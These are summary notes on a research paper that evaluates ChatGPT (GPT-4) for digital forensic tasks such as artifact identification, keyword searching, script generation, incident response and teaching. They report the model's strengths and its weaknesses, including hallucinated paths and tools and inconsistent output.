Notes on ChatGPT for Digital Forensic Investigation: The Good, The Bad, and The Unknown

ChatGPT in Digital Forensic Investigation

Objective of the Paper:
- To analyze the application of ChatGPT, particularly the GPT-4 model, in digital forensics which includes various use cases such as artifact understanding, evidence searching, code generation, anomaly detection, incident response, and education.
Key Concepts:
- Generative Artificial Intelligence (GAI): A significant innovation leading to discussions regarding its impact in various fields including digital forensics.
- Large Language Models (LLMs): Models like GPT-3.5 and GPT-4, that generate answers based on vast amounts of training data but can produce inaccuracies and 'hallucinated' facts.

Strengths and Weaknesses of ChatGPT

Strengths:
- May assist in educational contexts by providing a foundational understanding of digital forensics, creating keyword lists, generating storyboards for scenarios, and offering reassurance to experienced users.
- Can serve as a tool for code generation, providing a useful starting point for forensic scripts, often with comments and explanations.
Weaknesses:
- Data Reliability: Can produce inaccurate, outdated, or biased information due to limitations in training data. Lacks the ability to access real-time evidence or current event data.
- Contextual Understanding: Poor performance in contexts that require specialized knowledge or real-world understanding of digital forensics processes and tools.
- Inconsistent outputs for identical prompts, impacting reproducibility, which is critical in forensic investigations.

Specific Use Cases Evaluated

Artifact Identification
- File Downloads and Executions: Assisted investigators in identifying relevant artifacts like browser history, Windows event logs, and other system activity.
- Cloud Interactions: Generated possible sources of evidence from cloud platforms, although occasionally provided inaccurate paths or possibly non-existent tools.
Self-Directed Learning in Digital Forensics
- Introductory Level: Provided reasonable overviews of fundamental topics but had inaccuracies regarding specific process models and references.
- Advanced Level: Suggested general hands-on exercises but lacked depth in complex technical explanations.
Keyword Searching
- Capable of generating regular expressions and keyword lists, although these required validation for practical application in investigations. The commands provided, while detailed, sometimes failed to cover all necessary formats.
Assistance in Code Generation
- Successfully created scripts for tasks like file carving, RAID disk acquisition, and processing of encrypted zip files. However, it often resisted initial requests for potentially illegal tasks like password cracking but provided alternative guidance upon further prompting.
Incident Response
- Identified anomalies such as failed SSH login attempts but struggled to notice clear indicators like reverse shells unless specifically indicated.
- Offered basic interpretations of event logs and process listings but lacked a robust understanding of custom or unique attack signatures, reflecting limitations in contextual awareness.
Teaching Scenario Generation
- Demonstrated potential in generating storyboards and characters for teaching digital forensics, with the ability to create complex narratives and character backgrounds useful in educational contexts.

Conclusion and Future Directions

ChatGPT holds promise as a supportive tool in digital forensic investigations, particularly for those with foundational knowledge. There are multiple areas for further exploration, including embedding LLMs within forensic products for real-time querying and analysis.
Limitations to Acknowledge:
- These findings apply to experimental contexts that may not fully replicate real-world complexities of digital forensic tasks, emphasizing the essential role of human expertise in leveraging AI capabilities effectively.